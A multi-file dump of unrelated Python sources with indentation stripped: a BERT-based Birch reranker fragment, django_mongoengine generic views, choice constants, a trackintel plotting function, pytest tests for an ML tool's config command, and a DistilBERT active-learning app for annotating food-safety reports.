# self.bert.load_state_dict(torch.load("/GW/NeuralIR/nobackup/birch-emnlp_bert4ir_v2/models/converted"))
# converted_weights.msmarco_mb
# kevin's base model:
# self.bert = BertForNextSentencePrediction.from_pretrained("bert-base-uncased")
# saved_bert = torch.load("/GW/NeuralIR/nobackup/birch/models/saved.tmp_1")["model"]
# self.bert.load_state_dict(saved_bert.state_dict())
# also /GW/NeuralIR/nobackup/birch-emnlp_bert4ir_v2/models/export/birch-bert-base-kevin
self.bert = BertForNextSentencePrediction.from_pretrained(f"Capreolus/birch-bert-large-{config['pretrained']}")
if not config["finetune"]:
self.bert.requires_grad = False
self.bert_context = torch.no_grad
else:
self.bert_context = contextlib.nullcontext
def forward(self, doc, seg, mask):
batch = doc.shape[0]
with self.bert_context():
bi_scores = [self.score_passages(doc[bi], seg[bi], mask[bi], batch) for bi in range(batch)]
scores = torch.stack(bi_scores)
assert scores.shape == (batch, self.config["extractor"]["numpassages"], 2)
scores = scores[:, :, 1] # take second output
topk, _ = torch.topk(scores, dim=1, k=self.config["topk"])
doc_score = self.combine(topk)
return doc_score
def score_passages(self, doc, seg, mask, batch):
needed_passages = doc.shape[0]
maxlen = doc.shape[-1]
# find instances that contain a document (segment B)
# for unmasked tokens in seg B, seg+mask=2
# there are always two SEPs in segment B, so the document is not empty if there are >= 3 tokens where seg+mask=2
valid = ((seg + mask) == 2).sum(dim=1) > 2
if not any(valid):
valid[0] = True
doc, seg, mask = doc[valid], seg[valid], mask[valid]
out = []
batches = np.ceil(doc.shape[0] / batch).astype(int)
for bi in range(batches):
start = bi * batch
stop = (bi + 1) * batch
sb_doc, sb_seg, sb_mask = doc[start:stop], seg[start:stop], mask[start:stop]
# find first non-padding token and shorten batch to this length
idx = (sb_seg + sb_mask).argmax(dim=1).max()
sb_doc = sb_doc[:, : idx + 1]
sb_seg = sb_seg[:, : idx + 1]
sb_mask = sb_mask[:, : idx + 1]
# for idx in reversed(range(maxlen)):
# if any(sb_mask[:, idx]):
# sb_doc = sb_doc[:, : idx + 1]
# sb_seg = sb_seg[:, : idx + 1]
# sb_mask = sb_mask[:, : idx + 1]
# break
sb_scores = self.bert(input_ids=sb_doc, token_type_ids=sb_seg, attention_mask=sb_mask)
sb_scores = sb_scores[0] # for new bert output
out.append(sb_scores)
real_out = torch.cat(out, dim=0)
found_passages = real_out.shape[0]
if found_passages < needed_passages:
pad_out = torch.min(real_out, dim=0)[0].repeat(needed_passages - found_passages, 1)
return torch.cat((real_out, pad_out), dim=0)
else:
return real_out
@Reranker.register
class Birch(Reranker):
module_name = "birch"
config_spec = [
ConfigOption("topk", 3, "top k scores to use"),
ConfigOption("hidden", 0, "size of hidden layer or 0 to take the weighted sum of the topk"),
ConfigOption("finetune", False, "fine-tune the BERT model"),
ConfigOption("pretrained", "msmarco_mb", "pretrained Birch model to load: mb, msmarco_mb, or car_mb"),
]
dependencies = [
Dependency(
key="extractor",
module="extractor",
name="bertpassage",
default_config_overrides={"tokenizer": {"pretrained": "bert-large-uncased"}},
),
Dependency(key="trainer", module="trainer", name="pytorch"),
]
def build_model(self):
self.model = Birch_Class(self.extractor, self.config)
return self.model
def score(self, d):
return [
self.model(d["pos_bert_input"], d["pos_seg"], d["pos_mask"]).view(-1),
self.model(d["neg_bert_input"], d["neg_seg"], d["neg_mask"]).view(-1),
]
def test(self, d):
return self.model(d["pos_bert_input"], d["pos_seg"], d["pos_mask"]).view(-1)
|
from django.core.exceptions import ImproperlyConfigured
from django.contrib import messages
from django.utils.translation import ugettext_lazy as _, ugettext
from django.views.generic.edit import FormMixin, ProcessFormView, DeletionMixin, FormView
from django_mongoengine.forms.documents import documentform_factory
from django_mongoengine.views.detail import (SingleDocumentMixin, DetailView,
SingleDocumentTemplateResponseMixin, BaseDetailView)
class DocumentFormMixin(FormMixin, SingleDocumentMixin):
"""
    A mixin that provides a way to show and handle a document form in a request.
"""
success_message = None
def get_form_class(self):
"""
Returns the form class to use in this view
"""
if self.form_class:
return self.form_class
else:
if hasattr(self, 'object') and self.object is not None:
# If this view is operating on a single object, use
# the class of that object
document = self.object.__class__
elif self.document is not None:
# If a document has been explicitly provided, use it
document = self.document
else:
# Try to get a queryset and extract the document class
# from that
document = self.get_queryset()._document
exclude = getattr(self, 'form_exclude', ())
return documentform_factory(document, exclude=exclude)
def get_form_kwargs(self):
"""
        Returns the keyword arguments for instantiating the form.
"""
kwargs = super(DocumentFormMixin, self).get_form_kwargs()
kwargs.update({'instance': self.object})
return kwargs
def get_success_url(self):
if self.success_url:
url = self.success_url % self.object._data
else:
try:
url = self.object.get_absolute_url()
except AttributeError:
raise ImproperlyConfigured(
"No URL to redirect to. Either provide a url or define"
" a get_absolute_url method on the document.")
return url
def form_valid(self, form):
self.object = form.save()
document = self.document or form.Meta.document
msg = _("The %(verbose_name)s was updated successfully.") % {
"verbose_name": document._meta.verbose_name}
msg = self.success_message if self.success_message else msg
messages.add_message(self.request, messages.SUCCESS, msg, fail_silently=True)
return super(DocumentFormMixin, self).form_valid(form)
def get_context_data(self, **kwargs):
context = kwargs
if self.object:
context['object'] = self.object
context_object_name = self.get_context_object_name(self.object)
if context_object_name:
context[context_object_name] = self.object
return context
class EmbeddedFormMixin(FormMixin):
"""
    A mixin that provides a way to show and handle a document form in a request.
"""
embedded_form_class = None
embedded_context_name = 'embedded_form'
def get_form_class(self):
"""
Returns the form class to use in this view
"""
if self.embedded_form_class:
return self.embedded_form_class
else:
raise ImproperlyConfigured(
"No embedded form class provided. An embedded form class must be provided.")
def get_form(self, form_class):
"""
Returns an instance of the form to be used in this view.
"""
object = getattr(self, 'object', self.get_object())
return form_class(object, **self.get_form_kwargs())
def get_embedded_object(self):
"""
Returns an instance of the embedded object. By default this is a freshly created
instance. Override for something cooler.
"""
if hasattr(self, 'embedded_object'):
return self.embedded_object()
else:
klass = self.get_form_class()
return klass.Meta.document()
def get_form_kwargs(self):
"""
Returns the keyword arguments for instantiating the form.
"""
kwargs = super(EmbeddedFormMixin, self).get_form_kwargs()
object = self.get_embedded_object()
kwargs.update({'instance': object})
        if 'initial' not in kwargs:
kwargs['initial'] = {}
return kwargs
def get_success_url(self):
object = getattr(self, 'object', self.get_object())
if self.success_url:
url = self.success_url % object.__dict__
else:
try:
url = object.get_absolute_url()
except AttributeError:
raise ImproperlyConfigured(
"No URL to redirect to. Either provide a url or define"
" a get_absolute_url method on the document.")
return url
def form_valid(self, form):
self.embedded_object = form.save()
return super(EmbeddedFormMixin, self).form_valid(form)
def get_context_data(self, **kwargs):
context = super(EmbeddedFormMixin, self).get_context_data(**kwargs)
object = getattr(self, 'object', self.get_object())
if 'form' in kwargs:
form = kwargs['form']
else:
form = self.get_form(self.get_form_class())
context[self.embedded_context_name] = form
return context
class ProcessEmbeddedFormMixin(object):
"""
A mixin that processes an embedded form on POST.
Does not implement any GET handling.
"""
def post(self, request, *args, **kwargs):
self.object = self.get_object()
form_class = self.get_form_class()
form = self.get_form(form_class)
        if form.is_valid():
            return self.form_valid(form)
        else:
            return self.form_invalid(form)
class BaseEmbeddedFormMixin(EmbeddedFormMixin, ProcessEmbeddedFormMixin):
"""
A Mixin that handles an embedded form on POST and
adds the form into the template context.
"""
class BaseCreateView(DocumentFormMixin, ProcessFormView):
"""
    Base view for creating a new object instance.
Using this base class requires subclassing to provide a response mixin.
"""
def get(self, request, *args, **kwargs):
self.object = None
return super(BaseCreateView, self).get(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
self.object = None
return super(BaseCreateView, self).post(request, *args, **kwargs)
class CreateView(SingleDocumentTemplateResponseMixin, BaseCreateView):
"""
    View for creating a new object instance,
with a response rendered by template.
"""
template_name_suffix = '_form'
class BaseUpdateView(DocumentFormMixin, ProcessFormView):
"""
Base view for updating an existing object.
Using this base class requires subclassing to provide a response mixin.
"""
def get(self, request, *args, **kwargs):
self.object = self.get_object()
return super(BaseUpdateView, self).get(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
self.object = self.get_object()
return super(BaseUpdateView, self).post(request, *args, **kwargs)
class UpdateView(SingleDocumentTemplateResponseMixin, BaseUpdateView):
"""
View for updating an object,
    with a response rendered by template.
"""
template_name_suffix = '_form'
class BaseDeleteView(DeletionMixin, BaseDetailView):
"""
Base view for deleting an object.
Using this base class requires subclassing to provide a response mixin.
"""
class DeleteView(SingleDocumentTemplateResponseMixin, BaseDeleteView):
"""
View for deleting an object retrieved with `self.get_object()`,
with a response rendered by template.
"""
template_name_suffix = '_confirm_delete'
class EmbeddedDetailView(BaseEmbeddedFormMixin, DetailView):
"""
    Renders the detail view of a document and adds a
form for an embedded object into the template.
See BaseEmbeddedFormMixin for details on the form.
"""
def get_context_data(self, **kwargs):
# manually call parents get_context_data without super
# currently django messes up the super mro chain
# and for multiple inheritance only one tree is followed
context = BaseEmbeddedFormMixin.get_context_data(self, **kwargs)
context.update(DetailView.get_context_data(self, **kwargs))
return context
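# A hedged example of wiring one of these generic views to a document; the
# Article document, the URL pattern, and the success_url format are
# hypothetical:
#
#   class ArticleCreateView(CreateView):
#       document = Article
#       success_url = '/articles/%(slug)s/'
#
#   # urls.py
#   # path('articles/new/', ArticleCreateView.as_view(), name='article-create')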
|
class StatesStatus:
STATUS_NOT_SET = 0
NEW = 1
ACCEPTED = 2
COMPLETED = 3
DECLINED = 4
CANCELLED = 5
CLOSED = 6
STATE_STATUS_CHOICES = (
(StatesStatus.STATUS_NOT_SET, 'Status Not Set'),
(StatesStatus.NEW, 'New'),
(StatesStatus.ACCEPTED, 'Accepted'),
(StatesStatus.COMPLETED, 'Completed'),
    (StatesStatus.DECLINED, 'Declined'),
(StatesStatus.CANCELLED, 'Cancelled'),
(StatesStatus.CLOSED, 'Closed')
)
class PriorityStatus:
STATUS_NOT_SET = 0
HIGH = 1
MEDIUM = 2
LOW = 3
PRIORITY_CHOICES = (
(PriorityStatus.STATUS_NOT_SET, 'Status Not Set'),
(PriorityStatus.HIGH, 'High'),
(PriorityStatus.MEDIUM, 'Medium'),
(PriorityStatus.LOW, 'Low')
)
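# A hedged example of how these choice tuples would typically be used on a
# Django model; the Task model and its field names are hypothetical:
#
#   from django.db import models
#
#   class Task(models.Model):
#       status = models.IntegerField(choices=STATE_STATUS_CHOICES,
#                                    default=StatesStatus.NEW)
#       priority = models.IntegerField(choices=PRIORITY_CHOICES,
#                                      default=PriorityStatus.MEDIUM)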
|
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import warnings
from trackintel.geogr.distances import meters_to_decimal_degrees
from trackintel.visualization.osm import plot_osm_streets
from trackintel.visualization.util import regular_figure, save_fig
from trackintel.geogr.distances import check_gdf_planar
def plot_locations(
locations,
out_filename=None,
radius=150,
positionfixes=None,
staypoints=None,
staypoints_radius=100,
plot_osm=False,
axis=None,
):
"""Plot locations (optionally to a file).
Optionally, you can specify several other datasets to be plotted beneath the locations.
Parameters
----------
locations : GeoDataFrame (as trackintel locations)
The locations to plot.
out_filename : str, optional
The file to plot to, if this is not set, the plot will simply be shown.
radius : float, default 150 (meter)
The radius in meter with which circles around locations should be drawn.
positionfixes : GeoDataFrame (as trackintel positionfixes), optional
If available, some positionfixes that can additionally be plotted.
staypoints : GeoDataFrame (as trackintel staypoints), optional
If available, some staypoints that can additionally be plotted.
staypoints_radius : float, default 100 (meter)
The radius in meter with which circles around staypoints should be drawn.
plot_osm : bool, default False
        If this is set to True, an OSM street network will be downloaded and
        plotted beneath the other elements.
axis : matplotlib.pyplot.Artist, optional
axis on which to draw the plot
Examples
--------
>>> locs.as_locations.plot('output.png', radius=200, positionfixes=pfs, staypoints=sp, plot_osm=True)
"""
if axis is None:
_, ax = regular_figure()
else:
ax = axis
_, locations = check_gdf_planar(locations, transform=True)
if staypoints is not None:
staypoints.as_staypoints.plot(radius=staypoints_radius, positionfixes=positionfixes, plot_osm=plot_osm, axis=ax)
elif positionfixes is not None:
positionfixes.as_positionfixes.plot(plot_osm=plot_osm, axis=ax)
elif plot_osm:
west = locations["center"].x.min() - 0.03
east = locations["center"].x.max() + 0.03
north = locations["center"].y.max() + 0.03
south = locations["center"].y.min() - 0.03
plot_osm_streets(north, south, east, west, ax)
center_latitude = (ax.get_ylim()[0] + ax.get_ylim()[1]) / 2
radius = meters_to_decimal_degrees(radius, center_latitude)
for pt in locations.to_dict("records"):
circle = mpatches.Circle((pt["center"].x, pt["center"].y), radius, facecolor="none", edgecolor="r", zorder=4)
ax.add_artist(circle)
ax.set_aspect("equal", adjustable="box")
if out_filename is not None:
save_fig(out_filename, formats=["png"])
else:
plt.show()
|
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: EPL-2.0
#
from __future__ import print_function
import pytest
import re
from test_utils.io import catch_stdout
from mlt.commands.config import ConfigCommand
from mlt.utils import constants
@pytest.fixture
def init_mock(patch):
return patch('config_helpers.load_config')
@pytest.fixture
def update_config_mock(patch):
return patch('config_helpers.update_config')
def config(list=False, set=False, remove=False, name=None, value=None):
config_cmd = ConfigCommand({"list": list, "set": set, "remove": remove,
"<name>": name, "<value>": value})
with catch_stdout() as caught_output:
config_cmd.action()
output = caught_output.getvalue()
return output
def test_uninitialized_config_call():
"""
Tests calling the config command before the app has been initialized.
"""
with catch_stdout() as caught_output:
with pytest.raises(SystemExit):
ConfigCommand({})
output = caught_output.getvalue()
expected_error = "This command requires you to be in an `mlt init` " \
"built directory"
assert expected_error in output
def test_list_config(init_mock):
"""
Test calling the config list command and checks the output.
"""
init_mock.return_value = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
output = config(list=True)
p = re.compile("namespace[\s]+foo")
assert p.search(output)
p = re.compile("registry[\s]+bar")
assert p.search(output)
p = re.compile("{}.num_workers[\s]+2".format(
constants.TEMPLATE_PARAMETERS))
assert p.search(output)
def test_list_empty_configs(init_mock):
"""
Tests calling the config list command when there are no configs.
"""
init_mock.return_value = {}
output = config(list=True)
assert "No configuration parameters to display." in output
def test_set_existing_config(init_mock, update_config_mock):
"""
Tests modifying an existing config parameter
"""
mlt_config = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
init_mock.return_value = mlt_config
modified_parameter = "namespace"
new_value = "new-namespace"
config(set=True, name=modified_parameter, value=new_value)
mlt_config[modified_parameter] = new_value
update_config_mock.assert_called_with(mlt_config)
def test_set_new_config(init_mock, update_config_mock):
"""
Tests setting a new config parameter, and ensures that the parameter is
added to the config file.
"""
mlt_config = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
init_mock.return_value = mlt_config
new_parameter = "new_parameter"
new_value = "new_value"
config(set=True, name=new_parameter, value=new_value)
mlt_config[new_parameter] = new_value
update_config_mock.assert_called_with(mlt_config)
def test_set_existing_template_parameter(init_mock, update_config_mock):
"""
Tests modifying an existing template parameter
"""
mlt_config = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
init_mock.return_value = mlt_config
modified_parameter = "{}.num_workers".format(constants.TEMPLATE_PARAMETERS)
new_value = 4
config(set=True, name=modified_parameter, value=new_value)
mlt_config[constants.TEMPLATE_PARAMETERS][modified_parameter] = new_value
update_config_mock.assert_called_with(mlt_config)
def test_set_remove_new_template_parameter(init_mock, update_config_mock):
"""
Tests setting a new template parameter, ensures that the parameter is
added to the config file, then removes the parameter.
"""
mlt_config = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
init_mock.return_value = mlt_config
# Set new template parameter
new_parameter = "{}.num_ps".format(constants.TEMPLATE_PARAMETERS)
new_value = 1
config(set=True, name=new_parameter, value=new_value)
# Check that the config update was called with the new parameter
expected_parameter = mlt_config
expected_parameter[constants.TEMPLATE_PARAMETERS][new_parameter] = \
new_value
update_config_mock.assert_called_with(expected_parameter)
# Remove the parameter, and we should be back to the original
config(remove=True, name=new_parameter)
update_config_mock.assert_called_with(mlt_config)
def test_set_remove_new_parameter(init_mock, update_config_mock):
"""
Tests setting and removing a new parameter a few levels deep.
"""
mlt_config = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
init_mock.return_value = mlt_config
# Set new parameter
new_parameter = "foo1.foo2.foo3"
new_value = "new_value"
config(set=True, name=new_parameter, value=new_value)
# check that the config update was called with the new parameter
expected_config = mlt_config
expected_config["foo1"] = {}
expected_config["foo1"]["foo2"] = {}
expected_config["foo1"]["foo2"]["foo3"] = new_value
update_config_mock.assert_called_with(expected_config)
# Remove the parameter and check that we are back to the original config
config(remove=True, name=new_parameter)
update_config_mock.assert_called_with(mlt_config)
def test_remove_config_param(init_mock, update_config_mock):
"""
Tests removing an existing config
"""
mlt_config = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
init_mock.return_value = mlt_config
# Remove the registry parameter and check the config update arg
config(remove=True, name="registry")
expected_config = {
"namespace": "foo",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
update_config_mock.assert_called_with(expected_config)
@pytest.mark.parametrize("param_name", [
"does-not-exist",
"{}.does-not-exist".format(constants.TEMPLATE_PARAMETERS),
"subparam.does-not-exist"
])
def test_remove_invalid_param(init_mock, param_name):
"""
Tests trying to remove a parameter that does not exist
"""
mlt_config = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
init_mock.return_value = mlt_config
# Remove the registry parameter and check the config update arg
with pytest.raises(SystemExit):
output = config(remove=True, name=param_name)
assert "Unable to find config" in output
|
import eel
import os
import re
import time
import gzip
import csv
import hashlib
import json
import shutil
from datetime import datetime
from random import shuffle
from transformers import DistilBertTokenizer, DistilBertForTokenClassification
# downloading DistilBERT will take a while the first time
import torch
import torch.optim as optim
tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-cased', do_lower_case=False)
label_indexes = {"None":0, "Hazard":1, "Food":2, "Origin":3, "Destination":4}
eel.init('./')
current_model = None # current ML model
new_annotation_count = 1 # current count of annotations since last training (1 to trigger immediate training)
currently_training = False # if currently training
unlabeled_data = []
unlabeled_data_path = "safety_reports_v1.csv.gz"
labeled_data = []
evaluation_data = []
labeled_data_path = "data/safety_reports_training.csv"
evaluation_data_path = "data/safety_reports_evaluation.csv"
labeled_ids = {} # track already-labeled data
predicted_confs = {} # predicted confidence of current label on current model by url
all_predicted_confs = {} # most recent predicted confidence, not necessarily from most recent model
verbose = True
@eel.expose
def save_report(report):
'''Save annotated report
'''
global label_indexes
global labeled_data
global labeled_ids
global labeled_data_path
global evaluation_data_path
global new_annotation_count
report_id = report[0]
report_text = report[1]
report_date = report[2]
report_food = report[3]
report_hazard = report[4]
report_origin = report[5]
report_destination = report[6]
report.append(datetime.today().strftime('%Y-%m-%d-%H:%M:%S'))
if report_text == "":
return # empty submission
hazard_labels = get_labels_from_text(report_text, report_hazard, label_indexes["Hazard"])
food_labels = get_labels_from_text(report_text, report_food, label_indexes["Food"])
origin_labels = get_labels_from_text(report_text, report_origin, label_indexes["Origin"])
destination_labels = get_labels_from_text(report_text, report_destination, label_indexes["Destination"])
text_labels = []
numerical_labels = []
for ind in range(0,len(hazard_labels)):
if hazard_labels[ind] != 0:
text_labels.append("Hazard")
numerical_labels.append(hazard_labels[ind])
elif food_labels[ind] != 0:
text_labels.append("Food")
numerical_labels.append(food_labels[ind])
elif origin_labels[ind] != 0:
text_labels.append("Origin")
numerical_labels.append(origin_labels[ind])
elif destination_labels[ind] != 0:
text_labels.append("Destination")
numerical_labels.append(destination_labels[ind])
else:
text_labels.append("None")
numerical_labels.append(0)
tokens = tokenizer.tokenize(report_text)
numerical_tokens = tokenizer.convert_tokens_to_ids(tokens)
annotation = json.dumps([tokens, text_labels, numerical_tokens, numerical_labels])
report.append(annotation)
labeled_ids[report_id] = True
if is_evaluation(report_text):
append_data(evaluation_data_path,[report])
evaluation_data.append(report)
else:
append_data(labeled_data_path,[report])
labeled_data.append(report)
new_annotation_count += 1
def is_evaluation(text):
hexval = hashlib.md5(text.encode('utf-8')).hexdigest()
intval = int(hexval, 16)
if intval%4 == 0:
return True
else:
return False
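# Note: the md5-mod-4 split above deterministically routes roughly a quarter of
# report texts to the evaluation set, and the same text always lands in the
# same split across sessions.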
def get_labels_from_text(text, annotation, label=1):
'''Returns the per-token labels for annotation within text
Note: returns the first match only
'''
tokens = tokenizer.tokenize(text)
annotation_tokens = tokenizer.tokenize(annotation)
if len(annotation_tokens) == 0:
return [0] * len(tokens)
labels = []
for ind in range(0, len(tokens)):
if tokens[ind] == annotation_tokens[0]:
cur_ind = ind
matched = True
for token in annotation_tokens:
if tokens[cur_ind] != token:
matched = False
break
cur_ind += 1
if matched:
for token in annotation_tokens:
labels.append(label)
while len(labels) < len(tokens):
labels.append(0)
break
else:
labels.append(0)
return labels
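# A hedged illustration of the alignment this function produces; the exact
# token boundaries depend on the DistilBERT wordpiece tokenizer:
#
#   text = "salmonella found in ground beef"
#   labels = get_labels_from_text(text, "ground beef", label=label_indexes["Food"])
#   # labels has one entry per token in tokenizer.tokenize(text): the value 2
#   # (the "Food" index) on the tokens covering the first occurrence of
#   # "ground beef", and 0 everywhere else.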
@eel.expose
def get_next_report():
'''Gets next report chronologically
'''
global unlabeled_data
for report in unlabeled_data:
report_id = report[0]
if report_id in labeled_ids:
continue
return report
@eel.expose
def get_candidate_spans(text, use_model_predictions=True, use_ngrams=True):
'''Returns the potential spans in the text
Uses all ngrams in the text if no model exists
Uses model predictions if a model exists
When a model exists, backs off to ngrams
by having them lower ranked than model predictions
'''
global current_model
global label_indexes
spans = {}
# get potential spans. Back off to ngrams if none exist
ngrams = get_ngrams(text)
for label in label_indexes:
if label == "None":
continue
spans[label] = []
# MODEL PREDICTIONS GET TOP PRIORITY
if use_model_predictions and current_model != None:
spans = get_predictions(current_model, text)
# NGRAMS WITHIN THE TEXT ARE NEXT PRIORITY
if use_ngrams:
for label in spans:
candidates = spans[label]
for ngram in ngrams:
# TODO: use dict if needs to be faster
if ngram not in candidates:
candidates.append(ngram)
spans[label] = candidates
return spans
def get_ngrams(text, min_len=3,max_len=50):
'''Returns word ngrams between given character lengths
'''
ngrams = []
for start_ind in range(0, len(text)):
        if start_ind == 0 or (re.match(r"\W", text[start_ind-1]) and re.match(r"\w", text[start_ind])):
# at start of token
for end_ind in range(start_ind+(min_len-1), min(start_ind+(max_len-1),len(text))):
                if end_ind + 2 > len(text) or (re.match(r"\W", text[end_ind+1]) and re.match(r"\w", text[end_ind])):
string = text[start_ind: end_ind+1]
ngrams.append(string)
return ngrams
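# For example, with the default character bounds and word boundaries detected
# as above:
#
#   get_ngrams("raw beef", min_len=3, max_len=50)
#   # -> ['raw', 'raw beef', 'beef']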
def append_data(filepath, data):
with open(filepath, 'a', errors='replace') as csvfile:
writer = csv.writer(csvfile)
writer.writerows(data)
csvfile.close()
def load_reports(filepath):
'''Loads already-annotated data
'''
if not os.path.exists(filepath):
return []
new_data = []
with open(filepath, 'r') as csvfile:
reader = csv.reader(csvfile)
for item in reader:
labeled_ids[item[0]] = True # record this is now labeled
new_data.append(item)
return new_data
@eel.expose
def get_recent_reports(origin = "", hazard = "", food = ""):
'''Loads reports in reverse chronological order
Reports must match at least one of origin, hazard, or food
'''
global labeled_data
global evaluation_data
all_reports = labeled_data + evaluation_data
all_reports.sort(reverse=True, key=lambda x: x[0])
relevant_reports = []
for report in all_reports:
country_match = False
if origin == report[5] and origin != "":
country_match = True
hazard_match = False
if hazard == report[4] and hazard != "":
hazard_match = True
food_match = False
if food == report[3] and food != "":
food_match = True
if country_match or hazard_match or food_match:
relevant_reports.append(report)
return relevant_reports
def get_predictions(model, text):
'''Get model predictions of potential spans within the text
'''
inputs = tokenizer(text, return_tensors="pt")
candidates_by_label = {}
with torch.no_grad():
outputs = model(**inputs) #, labels=labels)
logits = outputs[0][0]
tokens = [""] + tokenizer.tokenize(text) + [""]
# iterate all predicted labels
for label in label_indexes:
label_number = label_indexes[label]
if label_number == 0:
continue # skip non-spans
uncertainties = []
for ind in range(1, len(tokens)-1):
prob_dist = torch.softmax(logits[ind], dim=0)
conf = prob_dist[label_number]
max_conf = torch.max(prob_dist)
ratio_conf = 1 - conf/max_conf
uncertainties.append(ratio_conf.item())
candidates = get_most_confident_spans(text, uncertainties, threshold=0.2)
less_conf_candidates = get_most_confident_spans(text, uncertainties, threshold=0.6)
for candidate in less_conf_candidates:
if candidate not in candidates:
candidates.append(candidate)
candidates_by_label[label] = candidates
return candidates_by_label
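# Ranking recap: ratio_conf compares the probability of this label against the
# model's most likely label for the token, so 0 means the label is the model's
# top choice. Spans whose endpoints fall under the 0.2 threshold are returned
# first, followed by the looser 0.6-threshold spans.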
def convert_tokens_to_text(tokens, reference_text):
'''Find best match for DistilBert tokens in the actual text
'''
text = tokenizer.convert_tokens_to_string(tokens)
if text in reference_text:
return text
else:
# try making spaces optional
regex = re.escape(text).replace(r"\ ", r"\s*").replace(" ", r"\s*")
match = re.search("("+regex+")", reference_text)
if match:
return match.group(1)
else:
# we couldn't find a match - return the tokenizer's text
return text
def get_most_confident_spans(text, uncertainties, threshold=0.5):
'''Get all spans whose start and end tokens are below the given uncertainty threshold
'''
tokens = tokenizer.tokenize(text)
candidates = []
for start_ind in range(0, len(tokens)):
if uncertainties[start_ind] <= threshold and not tokens[start_ind].startswith('##'):
for end_ind in range(start_ind, len(tokens)):
if uncertainties[end_ind] <= threshold and not tokens[end_ind].startswith('##'):
candidate = convert_tokens_to_text(tokens[start_ind:end_ind+1], text)
if candidate not in text:
print("WARNING couldn't find span in text: "+candidate)
else:
candidates.append(candidate)
# return in descending length
candidates.sort(key=len, reverse=True)
return candidates
def train_item(model, annotations, text):
model.zero_grad()
# numerical labels, padded for sentence start/fin tokens
numerical_labels = [0] + annotations[3] + [0]
labels = torch.tensor(numerical_labels).unsqueeze(0)
inputs = tokenizer(text, return_tensors="pt")
outputs = model(**inputs, labels=labels)
loss, logits = outputs[:2]
optimizer = optim.SGD(model.parameters(), lr=0.01)
loss.backward()
optimizer.step()
def retrain(epochs_per_item=2, min_to_train=5):
global current_model
global currently_training
global new_annotation_count
global labeled_data
if currently_training:
"skipping while model already training"
return
if len(labeled_data) < min_to_train:
print("too few annotations to train: "+str(len(labeled_data)))
return
currently_training = True
new_annotation_count = 0
new_model = DistilBertForTokenClassification.from_pretrained('distilbert-base-cased', num_labels=5)
for epoch in range(0, epochs_per_item):
print("epoch "+str(epoch))
shuffle(labeled_data)
for report in labeled_data:
annotations = json.loads(report[8])
report_text = report[1]
train_item(new_model, annotations, report_text)
eel.sleep(0.01) # allow other processes through
'''
MODEL EVALUATION CODE HERE IF YOU WANT TO TEST THAT IT IS GETTING BETTER
'''
current_model = new_model
timestamp = re.sub(r'\.[0-9]*', '_', str(datetime.now())).replace(" ", "_").replace("-", "").replace(":", "")
number_items = str(len(labeled_data))
model_path = "models/"+timestamp+number_items+".model"
current_model.save_pretrained(model_path)
if verbose:
print("saved model to "+model_path)
clean_old_models()
currently_training = False
def clean_old_models(max_prior=4):
models = []
files = os.listdir('models/')
for file_name in files:
if os.path.isdir('models/'+file_name):
if file_name.endswith(".model"):
models.append('models/'+file_name)
models.sort()  # file names start with a timestamp, so lexicographic order is oldest first
if len(models) > max_prior:
for filepath in models[:-max_prior]:
assert("models" in filepath and ".model" in filepath)
if verbose:
print("removing old model "+filepath)
shutil.rmtree(filepath)
def load_existing_model():
global current_model
model_path = ""
files = sorted(os.listdir('models'))  # newest (largest timestamp) ends up last
for file_name in files:
if file_name.endswith(".model"):
model_path = 'models/'+file_name
if model_path != '':
if verbose:
print("Loading model from "+model_path)
current_model = DistilBertForTokenClassification.from_pretrained(model_path, num_labels=5)
eel.sleep(0.1)
# get_predictions()
else:
if verbose:
print("Creating new uninitialized model (OK to ignore warnings)")
current_model = DistilBertForTokenClassification.from_pretrained('distilbert-base-cased', num_labels=5)
def check_to_train():
global new_annotation_count
global last_annotation
global currently_training
while True:
print("Checking to retrain")
if new_annotation_count > 0:
retrain()
# print(ct)
eel.sleep(10) # Use eel.sleep(), not time.sleep()
eel.spawn(check_to_train)
# load the unlabeled reports, plus any previously labeled and evaluation data
unlabeled_file = gzip.open(unlabeled_data_path, mode='rt')
csvobj = csv.reader(unlabeled_file,delimiter = ',',quotechar='"')
for row in csvobj:
unlabeled_data.append(row)
labeled_data = load_reports(labeled_data_path)
evaluation_data = load_reports(evaluation_data_path)
eel.start('food_safety.html', size=(800, 600))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Data container
"""
from __future__ import (
print_function,
division,
absolute_import,
unicode_literals)
from six.moves import xrange
# =============================================================================
# Imports
# =============================================================================
import logging
from .base import (
ObjectUtilMixin,
BaseData)
from .event import (
EventUtilMixin,
EventData)
from .event_with_score import (
ScoreUtilMixin,
EventWithScoreData)
# =============================================================================
# Metadata variables
# =============================================================================
# =============================================================================
# Public symbols
# =============================================================================
__all__ = [
'BaseData',
'ObjectUtilMixin',
'EventData',
'EventUtilMixin',
'EventWithScoreData',
'ScoreUtilMixin']
# =============================================================================
# Constants
# =============================================================================
# =============================================================================
# Variables
# =============================================================================
# =============================================================================
# Functions
# =============================================================================
# =============================================================================
